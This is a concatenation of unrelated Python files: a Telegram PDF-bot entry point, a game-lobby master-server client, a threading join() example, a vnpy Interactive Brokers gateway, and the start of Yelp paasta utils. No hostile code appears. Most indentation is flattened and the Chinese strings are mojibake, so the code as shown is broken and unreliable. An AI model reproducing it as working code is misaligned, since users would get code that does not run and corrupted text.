dispatcher.add_handler(watermark_cov_handler())
# PDF file handler
dispatcher.add_handler(file_cov_handler())
# Feedback handler
dispatcher.add_handler(feedback_cov_handler())
# Log all errors
dispatcher.add_error_handler(error_callback)
# Start the Bot
if APP_URL is not None:
updater.start_webhook(
listen="0.0.0.0",
port=PORT,
url_path=TELE_TOKEN,
webhook_url=APP_URL + TELE_TOKEN,
)
log.notice("Bot started webhook")
else:
updater.start_polling()
log.notice("Bot started polling")
    # Run the bot until you press Ctrl-C or the process receives SIGINT,
# SIGTERM or SIGABRT. This should be used most of the time, since
# start_polling() is non-blocking and will stop the bot gracefully.
updater.idle()
def start_msg(update: Update, context: CallbackContext) -> None:
update.effective_message.chat.send_action(ChatAction.TYPING)
# Create the user entity in Datastore
create_user(update.effective_message.from_user)
_ = set_lang(update, context)
update.effective_message.reply_text(
_(
"Welcome to PDF Bot!\n\n<b>Key features:</b>\n"
"- Compress, merge, preview, rename, split and add watermark to PDF files\n"
"- Create PDF files from text messages\n"
"- Extract images and text from PDF files\n"
"- Convert PDF files into images\n"
"- Convert webpages and images into PDF files\n"
"- Beautify handwritten notes images into PDF files\n"
"- <b><i>And more...</i></b>\n\n"
"Type /help to see how to use PDF Bot"
),
parse_mode=ParseMode.HTML,
)
def help_msg(update, context):
update.effective_message.chat.send_action(ChatAction.TYPING)
_ = set_lang(update, context)
keyboard = [
[InlineKeyboardButton(_("Set Language ๐"), callback_data=SET_LANG)],
[
InlineKeyboardButton(_("Join Channel"), f"https://t.me/{CHANNEL_NAME}"),
InlineKeyboardButton(_("Support PDF Bot"), callback_data=PAYMENT),
],
]
reply_markup = InlineKeyboardMarkup(keyboard)
update.effective_message.reply_text(
_(
"You can perform most of the tasks by sending me one of the followings:\n"
"- PDF files\n- Photos\n- Webpage links\n\n"
"The rest of the tasks can be performed by using the commands below:\n"
"/compare - compare PDF files\n"
"/merge - merge PDF files\n"
"/photo - convert and combine multiple photos into PDF files\n"
"/text - create PDF files from text messages\n"
"/watermark - add watermark to PDF files"
),
reply_markup=reply_markup,
)
def process_callback_query(update: Update, context: CallbackContext):
_ = set_lang(update, context)
query = update.callback_query
data = query.data
if CALLBACK_DATA not in context.user_data:
context.user_data[CALLBACK_DATA] = set()
if data not in context.user_data[CALLBACK_DATA]:
context.user_data[CALLBACK_DATA].add(data)
if data == SET_LANG:
send_lang(update, context, query)
elif data in LANGUAGES:
store_lang(update, context, query)
if data == PAYMENT:
send_support_options(update, context, query)
elif data in [THANKS, COFFEE, BEER, MEAL]:
send_payment_invoice(update, context, query)
context.user_data[CALLBACK_DATA].remove(data)
query.answer()
def send_msg(update: Update, context: CallbackContext):
tele_id = int(context.args[0])
message = " ".join(context.args[1:])
try:
context.bot.send_message(tele_id, message)
update.effective_message.reply_text("Message sent")
except Exception as e:
log = Logger()
log.error(e)
update.effective_message.reply_text("Failed to send message")
def error_callback(update: Update, context: CallbackContext):
    if not isinstance(context.error, Unauthorized):
log = Logger()
log.error(f'Update "{update}" caused error "{context.error}"')
if __name__ == "__main__":
main()
|
pewmaster.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import urllib.request
import urllib.parse
from threading import Thread
import time
import base64
import json
def sanitize(url):
return base64.b64encode(urllib.parse.quote(url).encode("utf-8")).decode()
def desanitize(url):
return urllib.parse.unquote(base64.b64decode(url).decode("utf-8"))
def querylize(_dict: dict):
query = ""
for key, value in _dict.items():
query += "&{}={}".format(key, sanitize(value))
return query
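# A small sketch of the encoding round trip used below (for illustration
# only): values are percent-encoded and then base64-encoded so they can be
# passed safely in the master server's query strings.
#
#     encoded = sanitize("my lobby")      # "bXklMjBsb2JieQ=="
#     desanitize(encoded)                 # "my lobby"
#     querylize({"game": "pew", "hostname": "my lobby"})
#     # -> "&game=cGV3&hostname=bXklMjBsb2JieQ=="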
class Lobby:
PEWMASTER_QUERY = "http://www.pixelsiege.net/master/query.php?game="
PEWMASTER_UPDATE = "http://www.pixelsiege.net/master/update.php?action="
@staticmethod
def list(game):
lobbies = []
url = "{}{}".format(Lobby.PEWMASTER_QUERY, sanitize(game))
status = 404
try:
response = urllib.request.urlopen(url)
            status = response.status
if status == 200:
raw_lobbies = response.read().decode("utf-8").splitlines()[1:]
for raw_lobby in raw_lobbies:
lobby = Lobby.parse(game, raw_lobby)
lobbies.append(lobby)
except:
pass
return (lobbies, status)
@staticmethod
def parse(game, raw_data):
data = raw_data.split('|')
hostname, private_ip, public_ip, info = [""] * 4
try:
hostname, private_ip, public_ip, info = desanitize(
data[0]), desanitize(data[1]), data[2], desanitize(data[3])
info = json.loads(base64.b64decode(info).decode("utf-8"))
except:
hostname, private_ip, public_ip = desanitize(
data[0]), desanitize(data[1]), data[2]
return Lobby(game, hostname, private_ip, public_ip, info, isData=True)
def __init__(self, game, hostname, private_ip=None, public_ip=None, info=None, isData=False):
self.game = game
self.hostname = hostname
self.private_ip = private_ip if private_ip else "127.0.0.1"
self.public_ip = public_ip
self.id = None
if not public_ip:
ip_request = urllib.request.urlopen('http://ip.42.pl/raw')
if ip_request.status == 200:
self.public_ip = ip_request.read().decode("utf-8")
self.info = info
self.__created = False
if not isData:
self.__created = True
self.__update_thread = Thread(target=self.__update)
self.__update_thread.daemon = True
query = {"game": self.game, "hostname": self.hostname}
if self.private_ip:
query["ip"] = self.private_ip
if self.info:
dump = json.dumps(self.info, indent=None,
ensure_ascii=False, separators=(',', ':'))
query["info"] = base64.b64encode(dump.encode("utf-8"))
queryString = querylize(query)
url = self.PEWMASTER_UPDATE + "create&" + queryString
response = urllib.request.urlopen(url)
self.id = int(response.read().decode("utf-8"))
self.__update_thread.start()
def close(self):
if not self.__created:
return
self.__update_thread.join(0)
url = self.PEWMASTER_UPDATE + "close&id=" + str(self.id)
urllib.request.urlopen(url)
self.__created = False
def update(self, hostname=None, info=None):
if not self.__created:
return
query = {}
if hostname:
query["hostname"] = hostname
self.hostname = hostname
if info:
query["info"] = info
self.info = info
queryString = querylize(query)
url = self.PEWMASTER_UPDATE + "update&id=" + str(self.id) + queryString
urllib.request.urlopen(url)
def __update(self):
while True:
time.sleep(60)
url = self.PEWMASTER_UPDATE + "update&id=" + str(self.id)
urllib.request.urlopen(url)
def __repr__(self):
return "{} - {}({}) {}".format(self.game, self.hostname, self.public_ip, self.info)
if __name__ == "__main__":
name = "111" + str(time.time())
    info_data = [1, 2, 3, {'k': True, 'n': False, "à": "éè&î@"}]
lobby = Lobby(name, "lobby_test", info=info_data)
print(lobby)
print(Lobby.list(name))
time.sleep(5)
lobby.update(hostname="UpdatedLobby")
print(lobby)
print(Lobby.list(name))
lobby.close()
|
03-threading_join.py
|
#!/usr/bin/env python3
# As in the previous example, a thread started as a `daemon` does not
# block the other threads or the main program: they will not wait for
# the daemon thread to exit before exiting themselves. Depending on the
# requirements, that is not always desirable.
# The `threading` module therefore provides a `join()` method, which
# blocks the calling thread (here, the main program) until the thread
# being joined terminates, either normally, through an exception, or
# after an optional timeout.
# This example demonstrates how joining the daemon thread keeps the
# program alive until it finishes, so a premature exit of the other
# threads does not cut the daemon thread short.
# i.e. `join()` makes the caller wait until the joined thread exits.
import threading
import logging
import time
def my_daemon():
logging.debug("Starting the `my_daemon` thread")
time.sleep(10)
logging.debug("Exiting the `my_daemon` thread")
def norm_thread():
logging.debug("Starting the `normal` thread")
# We are not setting a sleep here since we want to
# make sure that this function exits earlier than
# the `my_daemon()` function.
# But since `my_daemon()` is going to be called
# with `join()`, the calling thread has to wait
# until `my_daemon()` finishes.
logging.debug("Exiting the `normal` thread")
logging.basicConfig(level=logging.DEBUG, format="%(threadName)-1s: %(message)s")
daemon_thread = threading.Thread(name="daemon_thread", target=my_daemon, daemon=True)
normal_thread = threading.Thread(name="normal_thread", target=norm_thread)
daemon_thread.start()
normal_thread.start()
daemon_thread.join()
normal_thread.join()
|
ib_gateway.py
|
"""
IB Symbol Rules
SPY-USD-STK SMART
EUR-USD-CASH IDEALPRO
XAUUSD-USD-CMDTY SMART
ES-202002-USD-FUT GLOBEX
SI-202006-1000-USD-FUT NYMEX
ES-202006-C-2430-50-USD-FOP GLOBEX
"""
from copy import copy
from datetime import datetime
from queue import Empty
from threading import Thread, Condition
from typing import Optional
import shelve
from tzlocal import get_localzone
from ibapi import comm
from ibapi.client import EClient
from ibapi.common import MAX_MSG_LEN, NO_VALID_ID, OrderId, TickAttrib, TickerId
from ibapi.contract import Contract, ContractDetails
from ibapi.execution import Execution
from ibapi.order import Order
from ibapi.order_state import OrderState
from ibapi.ticktype import TickType, TickTypeEnum
from ibapi.wrapper import EWrapper
from ibapi.errors import BAD_LENGTH
from ibapi.common import BarData as IbBarData
from vnpy.trader.gateway import BaseGateway
from vnpy.trader.object import (
TickData,
OrderData,
TradeData,
PositionData,
AccountData,
ContractData,
BarData,
OrderRequest,
CancelRequest,
SubscribeRequest,
HistoryRequest
)
from vnpy.trader.constant import (
Product,
OrderType,
Direction,
Exchange,
Currency,
Status,
OptionType,
Interval
)
from vnpy.trader.utility import get_file_path
ORDERTYPE_VT2IB = {
OrderType.LIMIT: "LMT",
OrderType.MARKET: "MKT",
OrderType.STOP: "STP"
}
ORDERTYPE_IB2VT = {v: k for k, v in ORDERTYPE_VT2IB.items()}
DIRECTION_VT2IB = {Direction.LONG: "BUY", Direction.SHORT: "SELL"}
DIRECTION_IB2VT = {v: k for k, v in DIRECTION_VT2IB.items()}
DIRECTION_IB2VT["BOT"] = Direction.LONG
DIRECTION_IB2VT["SLD"] = Direction.SHORT
EXCHANGE_VT2IB = {
Exchange.SMART: "SMART",
Exchange.NYMEX: "NYMEX",
Exchange.GLOBEX: "GLOBEX",
Exchange.IDEALPRO: "IDEALPRO",
Exchange.CME: "CME",
Exchange.ICE: "ICE",
Exchange.SEHK: "SEHK",
Exchange.HKFE: "HKFE",
Exchange.CFE: "CFE",
Exchange.NYSE: "NYSE",
Exchange.NASDAQ: "NASDAQ",
Exchange.ARCA: "ARCA",
Exchange.EDGEA: "EDGEA",
Exchange.ISLAND: "ISLAND",
Exchange.BATS: "BATS",
Exchange.IEX: "IEX",
Exchange.IBKRATS: "IBKRATS",
Exchange.OTC: "PINK"
}
EXCHANGE_IB2VT = {v: k for k, v in EXCHANGE_VT2IB.items()}
STATUS_IB2VT = {
"ApiPending": Status.SUBMITTING,
"PendingSubmit": Status.SUBMITTING,
"PreSubmitted": Status.NOTTRADED,
"Submitted": Status.NOTTRADED,
"ApiCancelled": Status.CANCELLED,
"Cancelled": Status.CANCELLED,
"Filled": Status.ALLTRADED,
"Inactive": Status.REJECTED,
}
PRODUCT_IB2VT = {
"STK": Product.EQUITY,
"CASH": Product.FOREX,
"CMDTY": Product.SPOT,
"FUT": Product.FUTURES,
"OPT": Product.OPTION,
"FOT": Product.OPTION
}
OPTION_VT2IB = {OptionType.CALL: "CALL", OptionType.PUT: "PUT"}
CURRENCY_VT2IB = {
Currency.USD: "USD",
Currency.CNY: "CNY",
Currency.HKD: "HKD",
}
TICKFIELD_IB2VT = {
0: "bid_volume_1",
1: "bid_price_1",
2: "ask_price_1",
3: "ask_volume_1",
4: "last_price",
5: "last_volume",
6: "high_price",
7: "low_price",
8: "volume",
9: "pre_close",
14: "open_price",
}
ACCOUNTFIELD_IB2VT = {
"NetLiquidationByCurrency": "balance",
"NetLiquidation": "balance",
"UnrealizedPnL": "positionProfit",
"AvailableFunds": "available",
"MaintMarginReq": "margin",
}
INTERVAL_VT2IB = {
Interval.MINUTE: "1 min",
Interval.HOUR: "1 hour",
Interval.DAILY: "1 day",
}
JOIN_SYMBOL = "-"
class IbGateway(BaseGateway):
""""""
default_setting = {
"TWSๅฐๅ": "127.0.0.1",
"TWS็ซฏๅฃ": 7497,
"ๅฎขๆทๅท": 1,
"ไบคๆ่ดฆๆท": ""
}
exchanges = list(EXCHANGE_VT2IB.keys())
def __init__(self, event_engine):
""""""
super().__init__(event_engine, "IB")
self.api = IbApi(self)
def connect(self, setting: dict):
"""
Start gateway connection.
"""
host = setting["TWSๅฐๅ"]
port = setting["TWS็ซฏๅฃ"]
clientid = setting["ๅฎขๆทๅท"]
account = setting["ไบคๆ่ดฆๆท"]
self.api.connect(host, port, clientid, account)
def close(self):
"""
Close gateway connection.
"""
self.api.close()
def subscribe(self, req: SubscribeRequest):
"""
Subscribe tick data update.
"""
self.api.subscribe(req)
def send_order(self, req: OrderRequest):
"""
Send a new order.
"""
return self.api.send_order(req)
def cancel_order(self, req: CancelRequest):
"""
Cancel an existing order.
"""
self.api.cancel_order(req)
def query_account(self):
"""
Query account balance.
"""
pass
def query_position(self):
"""
Query holding positions.
"""
pass
def query_history(self, req: HistoryRequest):
""""""
return self.api.query_history(req)
class IbApi(EWrapper):
""""""
data_filename = "ib_contract_data.db"
data_filepath = str(get_file_path(data_filename))
local_tz = get_localzone()
def __init__(self, gateway: BaseGateway):
""""""
super().__init__()
self.gateway = gateway
self.gateway_name = gateway.gateway_name
self.status = False
self.reqid = 0
self.orderid = 0
self.clientid = 0
self.account = ""
self.ticks = {}
self.orders = {}
self.accounts = {}
self.contracts = {}
self.tick_exchange = {}
self.subscribed = set()
self.history_req = None
self.history_condition = Condition()
self.history_buf = []
self.client = IbClient(self)
self.thread = Thread(target=self.client.run)
def connectAck(self): # pylint: disable=invalid-name
"""
Callback when connection is established.
"""
self.status = True
self.gateway.write_log("IB TWS่ฟๆฅๆๅ")
self.load_contract_data()
def connectionClosed(self): # pylint: disable=invalid-name
"""
Callback when connection is closed.
"""
self.status = False
self.gateway.write_log("IB TWS่ฟๆฅๆญๅผ")
def nextValidId(self, orderId: int): # pylint: disable=invalid-name
"""
Callback of next valid orderid.
"""
super().nextValidId(orderId)
if not self.orderid:
self.orderid = orderId
def currentTime(self, time: int): # pylint: disable=invalid-name
"""
Callback of current server time of IB.
"""
super().currentTime(time)
dt = datetime.fromtimestamp(time)
time_string = dt.strftime("%Y-%m-%d %H:%M:%S.%f")
msg = f"ๆๅกๅจๆถ้ด: {time_string}"
self.gateway.write_log(msg)
def error(
self, reqId: TickerId, errorCode: int, errorString: str
): # pylint: disable=invalid-name
"""
Callback of error caused by specific request.
"""
super().error(reqId, errorCode, errorString)
msg = f"ไฟกๆฏ้็ฅ๏ผไปฃ็ ๏ผ{errorCode}๏ผๅ
ๅฎน: {errorString}"
self.gateway.write_log(msg)
def tickPrice( # pylint: disable=invalid-name
self, reqId: TickerId, tickType: TickType, price: float, attrib: TickAttrib
):
"""
Callback of tick price update.
"""
super().tickPrice(reqId, tickType, price, attrib)
if tickType not in TICKFIELD_IB2VT:
return
tick = self.ticks[reqId]
name = TICKFIELD_IB2VT[tickType]
setattr(tick, name, price)
# Update name into tick data.
contract = self.contracts.get(tick.vt_symbol, None)
if contract:
tick.name = contract.name
# Forex and spot product of IDEALPRO has no tick time and last price.
# We need to calculate locally.
exchange = self.tick_exchange[reqId]
if exchange is Exchange.IDEALPRO:
tick.last_price = (tick.bid_price_1 + tick.ask_price_1) / 2
tick.datetime = datetime.now(self.local_tz)
self.gateway.on_tick(copy(tick))
def tickSize(
self, reqId: TickerId, tickType: TickType, size: int
): # pylint: disable=invalid-name
"""
Callback of tick volume update.
"""
super().tickSize(reqId, tickType, size)
if tickType not in TICKFIELD_IB2VT:
return
tick = self.ticks[reqId]
name = TICKFIELD_IB2VT[tickType]
setattr(tick, name, size)
self.gateway.on_tick(copy(tick))
def tickString(
self, reqId: TickerId, tickType: TickType, value: str
): # pylint: disable=invalid-name
"""
Callback of tick string update.
"""
super().tickString(reqId, tickType, value)
if tickType != TickTypeEnum.LAST_TIMESTAMP:
return
tick = self.ticks[reqId]
dt = datetime.fromtimestamp(int(value))
tick.datetime = self.local_tz.localize(dt)
self.gateway.on_tick(copy(tick))
def orderStatus( # pylint: disable=invalid-name
self,
orderId: OrderId,
status: str,
filled: float,
remaining: float,
avgFillPrice: float,
permId: int,
parentId: int,
lastFillPrice: float,
clientId: int,
whyHeld: str,
mktCapPrice: float,
):
"""
Callback of order status update.
"""
super().orderStatus(
orderId,
status,
filled,
remaining,
avgFillPrice,
permId,
parentId,
lastFillPrice,
clientId,
whyHeld,
mktCapPrice,
)
orderid = str(orderId)
order = self.orders.get(orderid, None)
if not order:
return
order.traded = filled
# To filter PendingCancel status
order_status = STATUS_IB2VT.get(status, None)
if order_status:
order.status = order_status
self.gateway.on_order(copy(order))
def openOrder( # pylint: disable=invalid-name
self,
orderId: OrderId,
ib_contract: Contract,
ib_order: Order,
orderState: OrderState,
):
"""
Callback when opening new order.
"""
super().openOrder(
orderId, ib_contract, ib_order, orderState
)
orderid = str(orderId)
order = OrderData(
symbol=generate_symbol(ib_contract),
exchange=EXCHANGE_IB2VT.get(
ib_contract.exchange, Exchange.SMART),
type=ORDERTYPE_IB2VT[ib_order.orderType],
orderid=orderid,
direction=DIRECTION_IB2VT[ib_order.action],
volume=ib_order.totalQuantity,
gateway_name=self.gateway_name,
)
if order.type == OrderType.LIMIT:
order.price = ib_order.lmtPrice
elif order.type == OrderType.STOP:
order.price = ib_order.auxPrice
self.orders[orderid] = order
self.gateway.on_order(copy(order))
def updateAccountValue( # pylint: disable=invalid-name
self, key: str, val: str, currency: str, accountName: str
):
"""
Callback of account update.
"""
super().updateAccountValue(key, val, currency, accountName)
if not currency or key not in ACCOUNTFIELD_IB2VT:
return
accountid = f"{accountName}.{currency}"
account = self.accounts.get(accountid, None)
if not account:
account = AccountData(accountid=accountid,
gateway_name=self.gateway_name)
self.accounts[accountid] = account
name = ACCOUNTFIELD_IB2VT[key]
setattr(account, name, float(val))
def updatePortfolio( # pylint: disable=invalid-name
self,
contract: Contract,
position: float,
marketPrice: float,
marketValue: float,
averageCost: float,
unrealizedPNL: float,
realizedPNL: float,
accountName: str,
):
"""
Callback of position update.
"""
super().updatePortfolio(
contract,
position,
marketPrice,
marketValue,
averageCost,
unrealizedPNL,
realizedPNL,
accountName,
)
if contract.exchange:
exchange = EXCHANGE_IB2VT.get(contract.exchange, None)
elif contract.primaryExchange:
exchange = EXCHANGE_IB2VT.get(contract.primaryExchange, None)
else:
exchange = Exchange.SMART # Use smart routing for default
if not exchange:
msg = f"ๅญๅจไธๆฏๆ็ไบคๆๆๆไป{generate_symbol(contract)} {contract.exchange} {contract.primaryExchange}"
self.gateway.write_log(msg)
return
try:
ib_size = int(contract.multiplier)
except ValueError:
ib_size = 1
price = averageCost / ib_size
pos = PositionData(
symbol=generate_symbol(contract),
exchange=exchange,
direction=Direction.NET,
volume=position,
price=price,
pnl=unrealizedPNL,
gateway_name=self.gateway_name,
)
self.gateway.on_position(pos)
def updateAccountTime(self, timeStamp: str): # pylint: disable=invalid-name
"""
Callback of account update time.
"""
super().updateAccountTime(timeStamp)
for account in self.accounts.values():
self.gateway.on_account(copy(account))
def contractDetails(self, reqId: int, contractDetails: ContractDetails): # pylint: disable=invalid-name
"""
Callback of contract data update.
"""
super().contractDetails(reqId, contractDetails)
# Generate symbol from ib contract details
ib_contract = contractDetails.contract
if not ib_contract.multiplier:
ib_contract.multiplier = 1
symbol = generate_symbol(ib_contract)
# Generate contract
contract = ContractData(
symbol=symbol,
exchange=EXCHANGE_IB2VT[ib_contract.exchange],
name=contractDetails.longName,
product=PRODUCT_IB2VT[ib_contract.secType],
size=ib_contract.multiplier,
pricetick=contractDetails.minTick,
net_position=True,
history_data=True,
stop_supported=True,
gateway_name=self.gateway_name,
)
if contract.vt_symbol not in self.contracts:
self.gateway.on_contract(contract)
self.contracts[contract.vt_symbol] = contract
self.save_contract_data()
def execDetails(
self, reqId: int, contract: Contract, execution: Execution
): # pylint: disable=invalid-name
"""
Callback of trade data update.
"""
super().execDetails(reqId, contract, execution)
dt = datetime.strptime(execution.time, "%Y%m%d %H:%M:%S")
dt = self.local_tz.localize(dt)
trade = TradeData(
symbol=generate_symbol(contract),
exchange=EXCHANGE_IB2VT.get(contract.exchange, Exchange.SMART),
orderid=str(execution.orderId),
tradeid=str(execution.execId),
direction=DIRECTION_IB2VT[execution.side],
price=execution.price,
volume=execution.shares,
datetime=dt,
gateway_name=self.gateway_name,
)
self.gateway.on_trade(trade)
def managedAccounts(self, accountsList: str):
"""
Callback of all sub accountid.
"""
super().managedAccounts(accountsList)
if not self.account:
for account_code in accountsList.split(","):
self.account = account_code
self.gateway.write_log(f"ๅฝๅไฝฟ็จ็ไบคๆ่ดฆๅทไธบ{self.account}")
self.client.reqAccountUpdates(True, self.account)
def historicalData(self, reqId: int, ib_bar: IbBarData):
"""
Callback of history data update.
"""
dt = datetime.strptime(ib_bar.date, "%Y%m%d %H:%M:%S")
dt = self.local_tz.localize(dt)
bar = BarData(
symbol=self.history_req.symbol,
exchange=self.history_req.exchange,
datetime=dt,
interval=self.history_req.interval,
volume=ib_bar.volume,
open_price=ib_bar.open,
high_price=ib_bar.high,
low_price=ib_bar.low,
close_price=ib_bar.close,
gateway_name=self.gateway_name
)
self.history_buf.append(bar)
def historicalDataEnd(self, reqId: int, start: str, end: str):
"""
Callback of history data finished.
"""
self.history_condition.acquire()
self.history_condition.notify()
self.history_condition.release()
def connect(self, host: str, port: int, clientid: int, account: str):
"""
Connect to TWS.
"""
if self.status:
return
self.clientid = clientid
self.account = account
self.client.connect(host, port, clientid)
self.thread.start()
self.client.reqCurrentTime()
def close(self):
"""
Disconnect to TWS.
"""
if not self.status:
return
self.status = False
self.client.disconnect()
def subscribe(self, req: SubscribeRequest):
"""
Subscribe tick data update.
"""
if not self.status:
return
if req.exchange not in EXCHANGE_VT2IB:
self.gateway.write_log(f"ไธๆฏๆ็ไบคๆๆ{req.exchange}")
return
# Filter duplicate subscribe
if req.vt_symbol in self.subscribed:
return
self.subscribed.add(req.vt_symbol)
# Extract ib contract detail
ib_contract = generate_ib_contract(req.symbol, req.exchange)
if not ib_contract:
self.gateway.write_log("ไปฃ็ ่งฃๆๅคฑ่ดฅ๏ผ่ฏทๆฃๆฅๆ ผๅผๆฏๅฆๆญฃ็กฎ")
return
# Get contract data from TWS.
self.reqid += 1
self.client.reqContractDetails(self.reqid, ib_contract)
# Subscribe tick data and create tick object buffer.
self.reqid += 1
self.client.reqMktData(self.reqid, ib_contract, "", False, False, [])
tick = TickData(
symbol=req.symbol,
exchange=req.exchange,
datetime=datetime.now(self.local_tz),
gateway_name=self.gateway_name,
)
self.ticks[self.reqid] = tick
self.tick_exchange[self.reqid] = req.exchange
def send_order(self, req: OrderRequest):
"""
Send a new order.
"""
if not self.status:
return ""
if req.exchange not in EXCHANGE_VT2IB:
self.gateway.write_log(f"ไธๆฏๆ็ไบคๆๆ๏ผ{req.exchange}")
return ""
if req.type not in ORDERTYPE_VT2IB:
self.gateway.write_log(f"ไธๆฏๆ็ไปทๆ ผ็ฑปๅ๏ผ{req.type}")
return ""
self.orderid += 1
ib_contract = generate_ib_contract(req.symbol, req.exchange)
if not ib_contract:
return ""
ib_order = Order()
ib_order.orderId = self.orderid
ib_order.clientId = self.clientid
ib_order.action = DIRECTION_VT2IB[req.direction]
ib_order.orderType = ORDERTYPE_VT2IB[req.type]
ib_order.totalQuantity = req.volume
ib_order.account = self.account
if req.type == OrderType.LIMIT:
ib_order.lmtPrice = req.price
elif req.type == OrderType.STOP:
ib_order.auxPrice = req.price
self.client.placeOrder(self.orderid, ib_contract, ib_order)
self.client.reqIds(1)
order = req.create_order_data(str(self.orderid), self.gateway_name)
self.gateway.on_order(order)
return order.vt_orderid
def cancel_order(self, req: CancelRequest):
"""
Cancel an existing order.
"""
if not self.status:
return
self.client.cancelOrder(int(req.orderid))
def query_history(self, req: HistoryRequest):
""""""
self.history_req = req
self.reqid += 1
ib_contract = generate_ib_contract(req.symbol, req.exchange)
if req.end:
end = req.end
end_str = end.strftime("%Y%m%d %H:%M:%S")
else:
end = datetime.now(self.local_tz)
end_str = ""
delta = end - req.start
days = min(delta.days, 180) # IB only provides 6-month data
duration = f"{days} D"
bar_size = INTERVAL_VT2IB[req.interval]
if req.exchange == Exchange.IDEALPRO:
bar_type = "MIDPOINT"
else:
bar_type = "TRADES"
self.client.reqHistoricalData(
self.reqid,
ib_contract,
end_str,
duration,
bar_size,
bar_type,
1,
1,
False,
[]
)
self.history_condition.acquire() # Wait for async data return
self.history_condition.wait()
self.history_condition.release()
history = self.history_buf
self.history_buf = [] # Create new buffer list
self.history_req = None
return history
def load_contract_data(self):
""""""
f = shelve.open(self.data_filepath)
self.contracts = f.get("contracts", {})
f.close()
for contract in self.contracts.values():
self.gateway.on_contract(contract)
self.gateway.write_log("ๆฌๅฐ็ผๅญๅ็บฆไฟกๆฏๅ ่ฝฝๆๅ")
def save_contract_data(self):
""""""
f = shelve.open(self.data_filepath)
f["contracts"] = self.contracts
f.close()
class IbClient(EClient):
""""""
def run(self):
"""
Reimplement the original run message loop of eclient.
Remove all unnecessary try...catch... and allow exceptions to interrupt loop.
"""
while not self.done and self.isConnected():
try:
text = self.msg_queue.get(block=True, timeout=0.2)
if len(text) > MAX_MSG_LEN:
errorMsg = "%s:%d:%s" % (BAD_LENGTH.msg(), len(text), text)
self.wrapper.error(
NO_VALID_ID, BAD_LENGTH.code(), errorMsg
)
self.disconnect()
break
fields = comm.read_fields(text)
self.decoder.interpret(fields)
except Empty:
pass
def generate_ib_contract(symbol: str, exchange: Exchange) -> Optional[Contract]:
""""""
try:
fields = symbol.split(JOIN_SYMBOL)
ib_contract = Contract()
ib_contract.exchange = EXCHANGE_VT2IB[exchange]
ib_contract.secType = fields[-1]
ib_contract.currency = fields[-2]
ib_contract.symbol = fields[0]
if ib_contract.secType in ["FUT", "OPT", "FOP"]:
ib_contract.lastTradeDateOrContractMonth = fields[1]
if ib_contract.secType == "FUT":
if len(fields) == 5:
ib_contract.multiplier = int(fields[2])
if ib_contract.secType in ["OPT", "FOP"]:
ib_contract.right = fields[2]
ib_contract.strike = float(fields[3])
ib_contract.multiplier = int(fields[4])
except IndexError:
ib_contract = None
return ib_contract
def generate_symbol(ib_contract: Contract) -> str:
""""""
fields = [ib_contract.symbol]
if ib_contract.secType in ["FUT", "OPT", "FOP"]:
fields.append(ib_contract.lastTradeDateOrContractMonth)
if ib_contract.secType in ["OPT", "FOP"]:
fields.append(ib_contract.right)
fields.append(str(ib_contract.strike))
fields.append(str(ib_contract.multiplier))
fields.append(ib_contract.currency)
fields.append(ib_contract.secType)
symbol = JOIN_SYMBOL.join(fields)
return symbol
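# A minimal round-trip sketch (for illustration only), following the symbol
# rules documented at the top of this module:
#
#     contract = generate_ib_contract("ES-202002-USD-FUT", Exchange.GLOBEX)
#     # contract.symbol == "ES", contract.secType == "FUT",
#     # contract.lastTradeDateOrContractMonth == "202002",
#     # contract.currency == "USD", contract.exchange == "GLOBEX"
#     generate_symbol(contract)           # "ES-202002-USD-FUT"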
|
utils.py
|
# Copyright 2015-2017 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
import copy
import datetime
import difflib
import errno
import fcntl
import getpass
import glob
import hashlib
import io
import json
import logging
import math
import os
import pwd
import queue
import re
import shlex
import signal
import socket
import sys
import tempfile
import threading
import time
import warnings
from collections import OrderedDict
from enum import Enum
from fnmatch import fnmatch
from functools import lru_cache
from functools import wraps
from subprocess import PIPE
from subprocess import Popen
from subprocess import STDOUT
from types import FrameType
from typing import Any
from typing import Callable
from typing import cast
from typing import Collection
from typing import ContextManager
from typing import Dict
from typing import FrozenSet
from typing import IO
from typing import Iterable
from typing import Iterator
from typing import List
from typing import Mapping
from typing import Optional
from typing import Sequence
from typing import Set
from typing import Tuple
from typing import Type
from typing import TypeVar
from typing import Union
import choice
import dateutil.tz
import requests_cache
import service_configuration_lib
import yaml
from docker import Client
from docker.utils import kwargs_from_env
from kazoo.client import KazooClient
from mypy_extensions import TypedDict
from service_configuration_lib import read_service_configuration
import paasta_tools.cli.fsm
# DO NOT CHANGE SPACER, UNLESS YOU'RE PREPARED TO CHANGE ALL INSTANCES
# OF IT IN OTHER LIBRARIES (i.e. service_configuration_lib).
# It's used to compose a job's full ID from its name and instance
SPACER = "."
INFRA_ZK_PATH = "/nail/etc/zookeeper_discovery/infrastructure/"
PATH_TO_SYSTEM_PAASTA_CONFIG_DIR = os.environ.get(
"PAASTA_SYSTEM_CONFIG_DIR", "/etc/paasta/"
)
DEFAULT_SOA_DIR = service_configuration_lib.DEFAULT_SOA_DIR
DEFAULT_DOCKERCFG_LOCATION = "file:///root/.dockercfg"
DEPLOY_PIPELINE_NON_DEPLOY_STEPS = (
"itest",
"itest-and-push-to-registry",
"security-check",
"performance-check",
"push-to-registry",
)
# Default values for _log
ANY_CLUSTER = "N/A"
ANY_INSTANCE = "N/A"
DEFAULT_LOGLEVEL = "event"
no_escape = re.compile(r"\x1B\[[0-9;]*[mK]")
# instead of the convention of using underscores in this scribe channel name,
# the audit log uses dashes to prevent collisions with a service that might be
# named 'audit_log'
AUDIT_LOG_STREAM = "stream_paasta-audit-log"
DEFAULT_SYNAPSE_HAPROXY_URL_FORMAT = (
"http://{host:s}:{port:d}/;csv;norefresh;scope={scope:s}"
)
DEFAULT_CPU_PERIOD = 100000
DEFAULT_CPU_BURST_ADD = 1
log = logging.getLogger(__name__)
log.addHandler(logging.NullHandler())
INSTANCE_TYPES = (
"marathon",
"paasta_native",
"adhoc",
"kubernetes",
"tron",
"flink",
"cassandracluster",
"kafkacluster",
)
INSTANCE_TYPES_K8S = {"flink", "cassandracluster", "kafkacluster"}
